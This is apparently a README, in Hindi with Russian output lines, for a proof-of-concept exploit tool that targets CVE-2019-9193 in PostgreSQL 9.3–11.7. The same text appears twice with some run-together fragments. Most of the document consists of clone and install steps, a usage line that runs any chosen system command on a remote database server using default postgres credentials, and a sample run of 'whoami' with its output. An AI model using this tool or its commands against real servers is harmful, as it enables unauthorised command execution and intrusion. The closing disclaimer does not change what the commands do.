
एक PoC उपकरण है जो PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में प्रमाणित रिमोट कोड एक्सेक्यूशन (RCE) भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है।
GenPostgresRCEExploit एक PoC टूल है जिसे PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में एक प्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए डिज़ाइन किया गया है। यह प्रमाणित उपयोगकर्ताओं को CVE-2019-9193 के लिए संवेदनशील PostgreSQL डेटाबेस सर्वर पर सिस्टम कमांड निष्पादित करने की अनुमति देता है।
psycopg2 पैकेज)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c "<system_command>"
-i, --ip: PostgreSQL सर्वर का IP पता (डिफ़ॉल्ट: 127.0.0.1)-p, --port: PostgreSQL सर्वर का पोर्ट (डिफ़ॉल्ट: 5432)-d, --database: PostgreSQL डेटाबेस का नाम (डिफ़ॉल्ट: template1)-U, --user: PostgreSQL सर्वर से कनेक्ट करने के लिए उपयोगकर्ता नाम (डिफ़ॉल्ट: postgres)-P, --password: PostgreSQL सर्वर से कनेक्ट करने के लिए पासवर्ड (डिफ़ॉल्ट: postgres)-c, --command: सर्वर पर निष्पादित की जाने वाली सिस्टम कमांड-t, --timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
यह उदाहरण 192.168.1.10 पर PostgreSQL सर्वर से कनेक्ट होता है, दिए गए क्रेडेंशियल्स के साथ प्रमाणीकरण करता है, और whoami कमांड निष्पादित करता है।
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
यह टूल केवल शैक्षिक उद्देश्यों और नैतिक परीक्षण के लिए है। किसी भी प्रणाली के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
GenPostgresRCEExploit — यह एक PoC-एक्सप्लॉइट है, जिसे PostgreSQL के विशिष्ट संस्करणों (9.3 - 11.7) में रिमोट कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए विकसित किया गया है। यह प्रोग्राम प्रमाणित उपयोगकर्ताओं को CVE-2019-9193 के लिए संवेदनशील PostgreSQL सर्वर पर सिस्टम कमांड निष्पादित करने की अनुमति देता है।
psycopg2 पैकेज)git clone https://github.com/geniuszly/CVE-2019-9193
cd CVE-2019-9193
pip install -r requirements.txt
python3 GenPostgresRCEExploit.py -i <IP-адрес> -p <порт> -d <имя_базы_данных> -U <пользователь> -P <пароль> -c "<системная_команда>"
-i, --ip: PostgreSQL सर्वर का IP पता (डिफ़ॉल्ट: 127.0.0.1)-p, --port: PostgreSQL सर्वर का पोर्ट (डिफ़ॉल्ट: 5432)-d, --database: PostgreSQL डेटाबेस का नाम (डिफ़ॉल्ट: template1)-U, --user: PostgreSQL सर्वर से कनेक्ट करने के लिए उपयोगकर्ता नाम (डिफ़ॉल्ट: postgres)-P, --password: PostgreSQL सर्वर से कनेक्ट करने के लिए पासवर्ड (डिफ़ॉल्ट: postgres)-c, --command: सर्वर पर निष्पादित करने के लिए सिस्टम कमांड-t, --timeout: सेकंड में कनेक्शन टाइमआउट (डिफ़ॉल्ट: 10)python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"
इस उदाहरण में, प्रोग्राम 192.168.1.10 पते पर PostgreSQL सर्वर से कनेक्ट होता है, निर्दिष्ट डेटा के साथ प्रमाणीकरण करता है, और whoami कमांड निष्पादित करता है।
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"
[+] Подключение к базе данных PostgreSQL на 192.168.1.10:5432
[+] Соединение успешно установлено
[+] Проверка версии PostgreSQL
[+] Уязвимая версия PostgreSQL обнаружена: 10.4
[+] Создание временной таблицы: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Команда успешно выполнена
postgres
यह टूल केवल शैक्षिक उद्देश्यों और कानूनी परीक्षण के लिए है। किसी भी प्रणाली के विरुद्ध इस टूल का अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।